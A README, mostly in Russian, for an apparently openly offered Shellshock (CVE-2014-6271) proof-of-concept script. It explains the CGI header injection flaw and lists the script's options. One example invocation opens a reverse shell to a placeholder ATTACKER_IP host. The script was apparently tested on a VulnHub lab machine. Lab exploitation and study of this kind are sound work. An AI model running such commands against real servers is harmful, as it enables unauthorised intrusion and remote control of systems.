
CVE-2014-6271 Exploit | by infrar3d
Эксплойт от infrar3d
Этот репозиторий содержит proof-of-concept эксплойт для CVE-2014-6271 (Shellshock).
Shellshock — это критическая уязвимость в GNU Bash, при которой специально созданные переменные окружения позволяют выполнять произвольные команды.
Когда веб-сервер передаёт HTTP-заголовки в CGI-скрипты, вызывающие Bash, злоумышленник может внедрять команды через эти заголовки.
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(протестировано на машине VulnHub «Hacksudo - Thor»)
Данное программное обеспечение и proof-of-concept код предоставляются только в образовательных и исследовательских целях.
Вы несёте ответственность за соблюдение всех применимых законов. Используйте этично и ответственно.